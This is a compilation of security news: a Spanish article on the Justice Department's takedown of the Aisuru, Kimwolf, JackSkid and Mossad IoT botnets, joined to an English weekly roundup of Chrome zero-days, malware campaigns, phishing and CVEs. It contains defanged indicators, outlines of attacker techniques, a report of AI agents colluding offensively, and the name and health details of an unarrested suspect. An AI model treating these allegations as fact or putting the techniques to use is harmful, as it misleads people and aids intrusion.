Las autoridades confiscaron la infraestructura que impulsaba cuatro botnets que Secuestró un total de tres millones de dispositivos. y lanzaron más de 300.000 ataques DDoS en conjunto, dijo el jueves el Departamento de Justicia.

Las botnets (Aisuru, Kimwolf, JackSkid y Mossad) permitieron a los operadores vender acceso a los dispositivos infectados para diversos delitos cibernéticos. Las consecuencias abarcaron miles de ataques, incluidos algunos que exigían pagos de extorsión a las víctimas, dijeron los funcionarios.

La operación coordinada globalmente, ayudada por acciones policiales dirigidas a los operadores de botnets en Canadá y Alemania, interrumpió la infraestructura de comando y control de las cuatro botnets. Dos de las botnets establecieron récords antes de su eliminación, atrayendo la atención generalizada de investigadores y proveedores de seguridad.

La botnet Kimwolf, una variante de Android de Aisuru, se propagó como la pólvora después de que sus operadores descubrieron cómo abusar de las redes de proxy residenciales para el control local, según Sythient. Finalmente se hizo cargo más de 2 millones Dispositivos Android TV para enero. En septiembre, justo cuando Kimwolf se estaba formando, Cloudflare registró que la botnet Aisuru alcanzó un récord. Ataque DDoS de 29,7 terabits por segundo que duró 69 segundos.

En última instancia, los funcionarios atribuyeron aproximadamente 200.000 ataques DDoS a Aisuru, 90.000 a JackSkid, 25.000 a Kimwolf y alrededor de 1.000 comandos de ataque DDoS a la botnet Mossad. Sin embargo, los ataques DDoS de atacantes con motivaciones financieras suelen ser una distracción o una mala dirección.

«A menudo, un ataque DDoS es simplemente publicidad del tamaño de la botnet de un operador», dijo a CyberScoop Zach Edwards, investigador de amenazas de Infoblox. Los operadores de botnet obtienen dinero alquilando estos dispositivos controlados a ciberdelincuentes para abuso de cuentas, ataques de restablecimiento de contraseñas, esquemas de fraude publicitario y nodos proxy residenciales, añadió.

Los dispositivos infectados por las cuatro botnets incluyen grabadoras de vídeo digitales, cámaras web, enrutadores Wi-Fi y decodificadores de TV. Cientos de miles de estos dispositivos se encuentran en Estados Unidos, dijeron los fiscales federales.

Las autoridades no nombraron a las personas involucradas ni anunciaron formalmente ningún arresto. Sin embargo, describen la operación en términos casi concluyentes, afirmando que la acción interrumpió la infraestructura de comunicaciones de las botnets (dominios, servidores virtuales y otros sistemas) para evitar una mayor infección y limitar o eliminar la capacidad de las botnets de lanzar futuros ataques.

«Los ciberdelincuentes se infiltran en la infraestructura más allá de las fronteras físicas y el Servicio de Investigación Criminal de Defensa participa en operaciones internacionales para ayudar a salvaguardar la huella global del Departamento», dijo en un comunicado Kenneth DeChellis, agente especial a cargo de la oficina cibernética DCIS del Departamento de Defensa. Algunos de los ataques DDoS atribuidos a estas botnets alcanzaron direcciones IP propiedad de la Red de Información del Departamento de Defensa.

Las botnets a menudo compiten por dispositivos que infectar y oportunidades de escalar. A medida que Kimwolf se extendió y alcanzó esos objetivos, captó un gran interés por parte de investigadores, autoridades y proveedores capaces de ayudar a detenerlo.

Kimwolf fue la botnet DDoS más grande jamás detectada, según Tom Scholl, vicepresidente de Amazon Web Services, que ayudó en la operación. «La escala de esta botnet es asombrosa», dijo en un publicación en LinkedIn.

«Kimwolf representó un cambio fundamental en la forma en que operan y escalan las botnets», añadió Scholl. «A diferencia de las botnets tradicionales que escanean la Internet abierta en busca de dispositivos vulnerables, Kimwolf aprovechó un nuevo vector de ataque: las redes proxy residenciales».

Según este mecanismo, cualquier organización con dispositivos vulnerables conectados a Internet podría, sin saberlo, convertir esos dispositivos en un nodo para una botnet o un punto de apoyo para un ataque dirigido.

“Esto no es sólo un problema que tiene su primo porque compró una caja de TV barata que le prometía canales de televisión gratuitos”, dijo Edwards. Infoblox dijo anteriormente casi el 25% de los clientes tenía al menos un dispositivo terminal en un servicio de proxy residencial objetivo de Kimwolf.

Si bien es intelectualmente interesante cuando una botnet alcanza un tamaño extraordinario, también es un «triste recordatorio de que muchas veces la seguridad pasa a un segundo plano frente a la conveniencia y el costo», dijo Edwards.

«Las botnets están creciendo porque cada vez más personas compran cosas raras conectadas a Internet», añadió. «Nada en este mundo es gratis».

Los desmantelamientos marcan la continuación de una ofensiva constante y continua contra botnets de gran escala, mercados de delitos cibernéticos, malware, ladrones de información y otras herramientas de delitos cibernéticos. Algunas de las redes maliciosas obstaculizadas o que dejaron de funcionar debido a interrupciones y arrestos durante el año pasado incluyen: DanaBot, Rapper Bot, Lumma Stealer, AVCheck y SocksEscort.

Más de 20 empresas y organizaciones ayudaron con la interrupción coordinada, incluidas las fuerzas del orden de los Países Bajos y Europol. Los esfuerzos para detener las botnets continuarán a medida que estas redes maliciosas proliferen en nuevos lugares y de nuevas maneras.

«Vivimos en un tiovivo de dispositivo comprometido: botnet DDOS y aunque muchos de nosotros deseamos que algo pueda ralentizarlo, los desafíos continúan creciendo», dijo Edwards. «Este sigue siendo un mal día para los actores de amenazas graves, y cualquier día como ese es algo que todos deberíamos celebrar».

El Departamento de Justicia de EE. UU. (DoJ) anunció el jueves la interrupción de la infraestructura de comando y control (C2) utilizada por varias botnets de Internet de las cosas (IoT) como AISURU, Kimwolf, JackSkidy el Mossad como parte de una operación policial autorizada por el tribunal.

En el esfuerzo también las autoridades de Canadá y Alemania apuntaron a los operadores detrás de estas botnets, con una serie de empresas del sector privado, incluidas Akamai, Amazon Web Services, Cloudflare, DigitalOcean, Google, Lumen, Nokia, Okta, Oracle, PayPal, SpyCloud, Synthient, Team Cymru, Unit 221B y QiAnXin XLab ayudando en los esfuerzos de investigación.

«Las cuatro botnets lanzaron ataques distribuidos de denegación de servicio (DDoS) dirigidos a víctimas de todo el mundo», dijo el Departamento de Justicia. dicho. «Algunos de estos ataques midieron aproximadamente 30 Terabits por segundo, que fueron ataques sin precedentes».

En un informe del mes pasado, Cloudflare atribuyó a AISURU/Kimwolf a un ataque DDoS masivo de 31,4 Tbps que ocurrió en noviembre de 2025 y duró solo 35 segundos. Hacia finales del año pasado, también se estima que la botnet participó en ataques DDoS hipervolumétricos que tenían un tamaño promedio de 3 mil millones de paquetes por segundo (Bpps), 4 Tbps y 54 millones de solicitudes por segundo (Mrps).

El periodista independiente de seguridad Brian Krebs también rastreado el administrador de Kimwolf de Jacob Butler (también conocido como Dort), de 23 años, de Ottawa, Canadá. Butler le dijo a Krebs que no ha usado la personalidad de Dort desde 2021 y afirmó que alguien se está haciendo pasar por él después de comprometer su antigua cuenta.

Butler también dijo que «la mayor parte del tiempo se queda en casa y ayuda a su madre en las tareas del hogar porque lucha contra el autismo y la interacción social». De acuerdo a krebsel otro principal sospechoso es un joven de 15 años que reside en Alemania. No se han anunciado arrestos.

La botnet ha reclutado a más de 2 millones de dispositivos Android en su red, la mayoría de los cuales son televisores Android de otra marca comprometidos. En total, se estima que las cuatro botnets han infectado nada menos que 3 millones de dispositivos en todo el mundo, como grabadoras de vídeo digitales, cámaras web o enrutadores Wi-Fi, de los cuales cientos de miles se encuentran en EE.UU.

«Las botnets Kimwolf y JackSkid están acusadas de atacar e infectar dispositivos que tradicionalmente están ‘protegidos’ del resto de Internet. Los dispositivos infectados fueron esclavizados por los operadores de las botnets», dijo el Departamento de Justicia. «Los operadores utilizaron luego un modelo de ‘cibercrimen como servicio’ para vender el acceso a los dispositivos infectados a otros ciberdelincuentes».

Estos dispositivos infectados se utilizaron luego para realizar ataques DDoS contra objetivos de interés en todo el mundo. Los documentos judiciales alegan que las cuatro variantes de la botnet Mirai han emitido cientos de miles de comandos de ataque DDoS.

• AISURU – >200.000 comandos de ataque DDoS
• Kimwolf: >25.000 comandos de ataque DDoS
• JackSkid: >90.000 comandos de ataque DDoS
• Mossad: >1.000 comandos de ataque DDoS

«Kimwolf representó un cambio fundamental en la forma en que operan y escalan las botnets. A diferencia de las botnets tradicionales que escanean la Internet abierta en busca de dispositivos vulnerables, Kimwolf aprovechó un nuevo vector de ataque: las redes proxy residenciales», dijo Tom Scholl, vicepresidente e ingeniero distinguido de AWS, dicho en una publicación compartida en LinkedIn.

«Al infiltrarse en las redes domésticas a través de dispositivos comprometidos, incluidos decodificadores de TV y otros dispositivos IoT, la botnet obtuvo acceso a redes locales que normalmente están protegidas de amenazas externas por enrutadores domésticos».

Akamai dijo que las botnets hipervolumétricas generaron ataques que superaban los 30 Tbps, 14 mil millones de paquetes por segundo y 300 Mrps, y agregó que los ciberdelincuentes aprovecharon estas botnets para lanzar cientos de miles de ataques y exigir pagos de extorsión a las víctimas en algunos casos.

«Estos ataques pueden paralizar la infraestructura central de Internet, causar una degradación significativa del servicio para los ISP y sus clientes intermedios, e incluso abrumar los servicios de mitigación basados ​​en la nube de alta capacidad», dijo la empresa de infraestructura web. dicho.

Some weeks in security feel normal. Then you read a few tabs and get that immediate “ah, great, we’re doing this now” feeling.

This week has that energy. Fresh messes, old problems getting sharper, and research that stops feeling theoretical real fast. A few bits hit a little too close to real life, too. There’s a good mix here: weird abuse of trusted stuff, quiet infrastructure ugliness, sketchy chatter, and the usual reminder that attackers will use anything that works.

Scroll on. You’ll see what I mean.

⚡ Threat of the Week

Google Patches 2 Actively Exploited Chrome 0-Days — Google released security updates for its Chrome web browser to address two high-severity vulnerabilities that it said have been exploited in the wild. The vulnerabilities related to an out-of-bounds write vulnerability in the Skia 2D graphics library (CVE-2026-3909) and an inappropriate implementation vulnerability in the V8 JavaScript and WebAssembly engine (CVE-2026-3910) that could result in out-of-bounds memory access or code execution, respectively. Google did not share additional details about the flaws, but acknowledged that there exist exploits for both of them. The issues were addressed in Chrome versions 146.0.7680.75/76 for Windows and Apple macOS, and 146.0.7680.75 for Linux. 

🔔 Top News

• Meta to Discontinue Instagram E2EE in May 2026 — Meta announced plans to discontinue support for end-to-end encryption (E2EE) for chats on Instagram after May 8, 2026. In a statement shared with The Hacker News, a Meta spokesperson said, «Very few people were opting in to end-to-end encrypted messaging in DMs, so we’re removing this option from Instagram in the coming months. Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp.»
• Authorities Disrupt SocksEscort Service — A court-authorized international law enforcement operation dismantled a criminal proxy service named SocksEscort that enslaved thousands of residential routers worldwide into a botnet for committing large-scale fraud. «The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers,» the U.S. Justice Department said. The main thing to note here is that SocksEscort was powered by AVrecon, a malware written in C to explicitly target MIPS and ARM architectures via known security flaws in edge network devices. The malware also featured a novel persistence mechanism that involved flashing custom firmware, which intentionally disables future updates, permanently transforming SOHO routers into SocksEscort proxy nodes to blindside corporate monitoring.
• UNC6426 Exploits nx npm Supply Chain Attack to Gain AWS Admin Access in 72 Hours — A threat actor known as UNC6426 leveraged keys stolen following the supply chain compromise of the nx npm package in August 2025 to completely breach a victim’s AWS environment within 72 hours. UNC6426 used the access to abuse the GitHub-to-AWS OpenID Connect (OIDC) trust and create a new administrator role in the cloud environment, Google said. Subsequently, this role was abused to exfiltrate files from the client’s Amazon Web Services (AWS) Simple Storage Service (S3) buckets and perform data destruction in their production cloud environments.
• KadNap Enslaves Network Devices to Fuel Illegal Proxy — A takedown-resistant botnet comprising more than 14,000 routers and other network devices has been conscripted into a proxy network that anonymously ferries traffic used for cybercrime. The botnet, named KadNap, exploits known vulnerabilities in Asus routers (among others), leveraging the initial access to drop shell scripts that reach out to a peer-to-peer network based on Kademlia for decentralized control. Infected devices are being used to fuel a proxy service named Doppelganger that, for a fee, tunnels customers’ internet traffic through residential IP addresses, offering a way for attackers to blend in and make it harder to differentiate malicious traffic from legitimate activity.
• APT28 Strikes with Sophisticated Toolkit — The Russian threat actor known as APT28 has been observed using a bespoke toolkit in recent cyber espionage campaigns targeting Ukrainian cyber assets. The primary components of the toolkit are two implants, one of which employs techniques from a malware framework the threat actor used in 2010s, while the other is a heavily modified version of the COVENANT framework for long-term spying. COVENANT is used in concert with BEARDSHELL to facilitate data exfiltration, lateral movement, and execution of PowerShell commands. Also alongside these tools is a malware named SLIMAGENT that shares overlaps with XAgent.

‎️‍🔥 Trending CVEs

New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The flaws below are this week’s most critical — high-severity, widely used software, or already drawing attention from the security community.

Check these first, patch what applies, and don’t wait on the ones marked urgent — CVE-2026-3909, CVE-2026-3910, CVE-2026-3913 (Google Chrome), CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, CVE-2026-21671 (Veeam Backup & Replication), CVE-2026-27577, CVE-2026-27493, CVE-2026-27495, CVE-2026-27497 (n8n), CVE-2026-26127, CVE-2026-21262 (Microsoft Windows), CVE-2019-17571, CVE-2026-27685 (SAP), CVE-2026-3102 (ExifTool for macOS), CVE-2026-27944 (Nginx UI), CVE-2025-67826 (K7 Ultimate Security), CVE-2026-26224, CVE-2026-26225 (Intego X9), CVE-2026-29000 (pac4j-jwt), CVE-2026-23813 (HPE Aruba Networking AOS-CX), CVE-2025-12818 (PostgreSQL), CVE-2026-2413 (Ally WordPress plugin), CVE-2026-0953 (Tutor LMS Pro WordPress plugin), CVE-2026-25921 (Gogs), CVE-2026-2833, CVE-2026-2835, CVE-2026-2836 (Cloudflare Pingora), CVE-2026-24308 (Apache ZooKeeper), CVE-2026-3059, CVE-2026-3060, CVE-2026-3989 (SGLang), CVE-2026-0231 (Palo Alto Networks Cortex XDR Broker VM), CVE-2026-20040, CVE-2026-20046 (Cisco IOS XR Software), CVE-2025-65587 (graphql-upload-minimal), CVE-2026-3497 (OpenSSH), CVE-2026-26123 (Microsoft Authenticator for Android and iOS), and CVE-2025-61915 (CUPS).

🎥 Cybersecurity Webinars

• Stop Guessing: Automate Your Defense Against Real-World Attacks → Learn how to move beyond basic security checklists by using automation to test your defenses against real-world attacks. Experts will show you why traditional testing often fails and how to use continuous, data-driven tools to find and fix gaps in your protection. You will learn how to prove your security actually works without increasing your manual workload.
• Fix Your Identity Security: Closing the Gaps Before Hackers Find Them → This webinar covers a new study about why many companies are struggling to keep their user accounts and digital identities safe. Experts share findings from the Ponemon Institute on the biggest security gaps, such as disconnected apps and the new risks created by AI. You will learn simple, practical steps to fix these problems and get better control over who has access to your company’s data.
• The Ghost in the Machine: Securing the Secret Identities of Your AI Agents → As artificial intelligence (AI) begins to act on its own, businesses face a new challenge: how to give these «AI agents» the right digital IDs. This webinar explains why current security for humans doesn’t work for autonomous bots and how to build a better system to track what they do. You will learn simple, real-world steps to give AI agents secure identities and clear rules, ensuring they don’t accidentally expose your private company data.

📰 Around the Cyber World

• Fake Google Security Check Drops Browser RAT — A web page mimicking a Google Account security page has been spotted delivering a fully featured browser-based surveillance toolkit that takes the form of a Progressive Web App (PWA). «Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device’s contact list, real-time GPS location, and clipboard contents—all without installing a traditional app,» Malwarebytes said. «For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording.»
• Forbidden Hyena Delivers BlackReaperRAT — A hacktivist group known as Forbidden Hyena (aka 4B1D) has distributed RAR archives in December 2025 and January 2026 in attacks targeting Russia that led to the deployment of a previously undocumented remote access trojan called BlackReaperRAT and an updated version of the Blackout Locker ransomware, referred to as Milkyway by the threat actors. BlackReaperRAT is capable of running commands via «cmd.exe,» uploading/downloading files, spawning an HTTP shell to receive commands, and spreading the malware to connected removable media. «It carries out destructive attacks against organizations across various sectors located within the Russian Federation,» BI.ZONE said. «The group publishes information regarding successful attacks on its Telegram channel. It collaborates with the groups Cobalt Werewolf and Hoody Hyena.»
• Chinese Hackers Target the Persian Gulf region with PlugX — A China-nexus threat actor, likely suspected to be Mustang Panda, has targeted countries in the Persian Gulf region. The activity took place within the first 24 hours of the ongoing conflict in the Middle East late last month. The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. «The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering,» Zscaler said. «The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DOH) for domain resolution.»
• Phishing Campaign Uses SEO Poisoning to Steal Data — A phishing campaign has employed SEO poisoning to direct search engine results to fake traffic ticket portals that impersonate the Government of Canada and specific provincial agencies. «The campaign lures victims to a fake ‘Traffic Ticket Search Portal’ under the pretense of paying outstanding traffic violations,» Palo Alto Networks Unit 42 said. «Submitted data includes license plates, address, date of birth, phone/email, and credit card numbers.» The phishing pages utilize a «waiting room» tactic where the victim’s browser polls the server every two seconds and triggers redirects based on specific status codes.
• Roundcube Exploitation Toolkit Discovered — Hunt.io said it discovered a Roundcube exploitation toolkit on an internet-exposed directory on 203.161.50[.]145. It’s worth noting that Russian threat actors like APT28, Winter Vivern, and TAG-70 have repeatedly targeted Roundcube vulnerabilities to breach Ukrainian organizations. «The directory included development and production XSS payloads, a Flask-based command-and-control server, CSS-injection tooling, operator bash history, and a Go-based implant deployed on a compromised Ukrainian web application,» the company said, attributing it with medium to high confidence to APT28, citing overlaps with Operation RoundPress. The toolkit, dubbed Roundish, supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and two-factor authentication (2FA) secret extraction, mirroring a feature present in MDAEMON. One of the primary targets of the attack is mail.dmsu.gov[.]ua, a Roundcube webmail instance associated with Ukraine’s State Migration Service (DMSU). Besides the possibility of a shared development lineage, Roundish introduces four new components not previously documented in APT28 webmail activity, including a CSS-based side-channel module, browser credential stealer, and a Go-based backdoor that provides persistence via cron, systemd, and SELinux. The CSS injection component is designed to progressively extract characters from Roundcube’s document object model (DOM) without injecting any JavaScript into the victim’s page. The technique is likely used for targeting Cross-Site Request Forgery (CSRF) tokens or email UIDs. Central to the Roundish toolkit is an XSS payload that’s engineered to steal the victim’s email address, harvest account credentials, redirect all incoming emails to a Proton Mail address, export mailbox data from the victim’s Inbox and Sent folders, and gather the victim’s complete address book. «The combination of hidden autofill credential harvesting, server-side mail forwarding persistence, bulk mailbox exfiltration, and browser credential theft reflects a modular approach designed for sustained access,» Hunt.io said. «From a defensive perspective, password resets alone are not sufficient in cases like this. Mail forwarding rules, Sieve filters, and multi-factor authentication secrets must be audited and reset.»
• Phishing Campaign Targeting AWS Console Credentials — An active adversary-in-the-middle (AiTM) phishing campaign is using fake security alert emails to steal AWS Console credentials, per Datadog. «The phishing kit proxies authentication to the legitimate AWS sign-in endpoint in real time, validating credentials before redirecting victims and likely capturing one-time password (OTP) codes,» the company said. «This campaign does not exploit AWS vulnerabilities or abuse AWS infrastructure.» Post-compromise console access has been observed within 20 minutes of credential submission. These efforts originated from Mullvad VPN infrastructure.
• Malicious npm Packages Deliver Cipher stealer — Two new malicious npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, were found to deliver via Dropbox a Windows executable designed to siphon sensitive data, including Discord totems, credentials from Chrome, Edge, Opera, Brave, and Yandex browsers, and seed files from cryptocurrency wallet apps like Exodus. from compromised hosts using a stealer named Cipher stealer. «The stealer also uses an embedded Python script and a secondary payload downloaded from GitHub,» JFrog said.
• GIBCRYPTO Ransomware Detailed — A new ransomware called GIBCRYPTO comes with the ability to capture keystrokes and corrupt the Master Boot Record (MBR) so that any attempt to restart the system will cause the system to run into an error. The ransomware uses the Salsa20 algorithm for encryption. It’s suspected to be part of Snake Keylogger, indicating the malware authors’ attempts to diversify beyond information theft. The development comes as Sygnia highlighted SafePay’s OneDrive-based data exfiltration technique during a ransomware attack after breaching a victim by leveraging a FortiGate firewall flaw and a misconfigured administrative account. «SafePay gained initial access by exploiting a firewall misconfiguration, which enabled them to obtain local administrative credentials,» the company said. «They rapidly escalated discovery and enumeration activities to identify high-value targets for lateral movement, demonstrating a structured and methodical approach to mapping the environment. Within a matter of hours, SafePay escalated to domain administrator access.» The attack culminated in the deployment of ransomware, encrypting more than 60 servers.
• Fraudulent Account Registration Activity Originating from Vietnam — A sprawling cybercrime ecosystem based in Vietnam has been linked to a cluster of fraudulent account registration activity on platforms like LinkedIn, Instagram, Facebook, and TikTok. In these attacks, attributed to O-UNC-036, the threat actors rely on disposable email addresses in order to execute SMS pumping attacks, also called International Revenue Sharing Fraud (IRSF). «In this scheme, malicious actors automate the creation of puppet accounts in a targeted service provider,» Okta said. «Fraudsters use these account registrations to trigger SMS messages to premium rate phone numbers and profit from charges incurred. This activity can prove costly for service providers who use SMS to verify registration information in customer accounts or to send multi-factor authentication (MFA) security codes.» O-UNC-036 has also been linked to a cybercrime-as–a-service (CaaS) ecosystem that provides paid infrastructure and services to facilitate online fraud. The web-based storefronts are hosted in Vietnam and specialize in the sales of web-based accounts.
• Hijacked AppsFlyer SDK Distributes Crypto Clipper — The AppsFlyer Web SDK was briefly hijacked to serve malicious code to steal cryptocurrency in a supply chain attack. The clipper malware payload came with capabilities to intercept cryptocurrency wallet addresses entered on websites and replace them with attacker-controlled addresses to divert funds to the threat actor. «The AppsFlyer Web SDK was observed serving obfuscated malicious JavaScript instead of the legitimate SDK from websdk.appsflyer[.]com,» Profero said. «The malicious payload appears to have been designed for stealth and compatibility, preserving legitimate SDK functionality while adding hidden browser hooks and wallet-hijacking logic.» The incident has since been resolved by AppsFlyer.
• Operation CamelClone Targets Government and Defense Entities — A new cyber espionage campaign dubbed Operation CamelClone has targeted governments and defense entities in Algeria, Mongolia, Ukraine, and Kuwait using malicious ZIP archives that contain a Windows shortcut (LNK) file, which, when executed, delivers a JavaScript loader named HOPPINGANT. The loader then delivers additional payloads for establishing C2 and exfiltrating data to the MEGA cloud storage service. «One interesting aspect of this campaign is that the threat actor does not rely on traditional command-and-control infrastructure,» Seqrite Labs said. «Instead, the payloads are hosted on a public file-sharing service, filebulldogs[.]com, while stolen data is uploaded to MEGA storage using the legitimate tool Rclone.» The activity has not been attributed to any known threat group.
• How Threat Actors Exfiltrate Credentials Using Telegram Bots — Threat actors are abusing the Telegram Bot API to exfiltrate data via text messages or arbitrary file uploads, highlighting how legitimate services can be weaponized to evade detection. Agent Tesla Keylogger is by far the most prominent example of a malware family that uses Telegram for C2. «In general, Telegram C2s appear to be most popular among information stealers, possibly due to Telegram’s technically legitimate nature and because information stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers,» Cofense said.
• Microsoft Launches Copilot Health — Microsoft has become the latest company after OpenAI and Anthropic to launch a dedicated «secure space» called Copilot Health that integrates medical records, biometric data from wearables, and lab test results to give personalized advice in the U.S. «Copilot Health brings together your health records, wearable data, and health history into one place, then applies intelligence to turn them into a coherent story,» the company said. Like OpenAI and Anthropic, Microsoft emphasized that Copilot Health isn’t meant to replace professional medical care.
• Rogue AI Agents Can Work Together to Engage in Offensive Behaviors — According to a new report from artificial intelligence (AI) security company Irregular, agents can work together to hack into systems, escalate privileges, disable endpoint protection, and steal sensitive data while evading pattern-matching defenses. What’s notable is that the experiment did not rely on adversarial prompting or deliberately unsafe system design. «In one case, an agent convinced another agent to carry out an offensive action, a form of inter-agent collusion that emerged with no external manipulation,» Irregular said. «This scenario demonstrates two compounding risks: inter-agent persuasion can erode safety boundaries, and agents can independently develop techniques to circumvent security controls. When an agent is given access to tools or data, particularly but not exclusively shell or code access, the threat model should assume that the agent will use them, and that it will do so in unexpected and possibly malicious ways.»

🔧 Cybersecurity Tools

• Dev Machine Guard → It is a free, open-source tool that scans your computer to show you exactly what developer tools and scripts are running. It creates a simple list of your AI coding assistants, code editor extensions, and software packages to help you find anything suspicious or outdated. It is a single script that works in seconds to give you better visibility into the security of your local coding environment.
• Trajan → It is an automated security tool designed to find hidden vulnerabilities in «service meshes,» which are the systems that manage how different parts of a large software application talk to each other. Because these systems are complex, it is easy for engineers to make small mistakes in the settings that allow hackers to bypass security or steal data. Trajan works by scanning these configurations to spot those specific errors and helping developers fix them before they can be exploited.

Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws.

Conclusion

There’s a lot packed in here, and not in a neat way. Some of it is the usual recycled chaos, some of it feels a little more deliberate, and some of it has that nasty “this is going to show up everywhere by next week” energy.

Anyway — enough throat-clearing. Here’s the stuff worth your attention.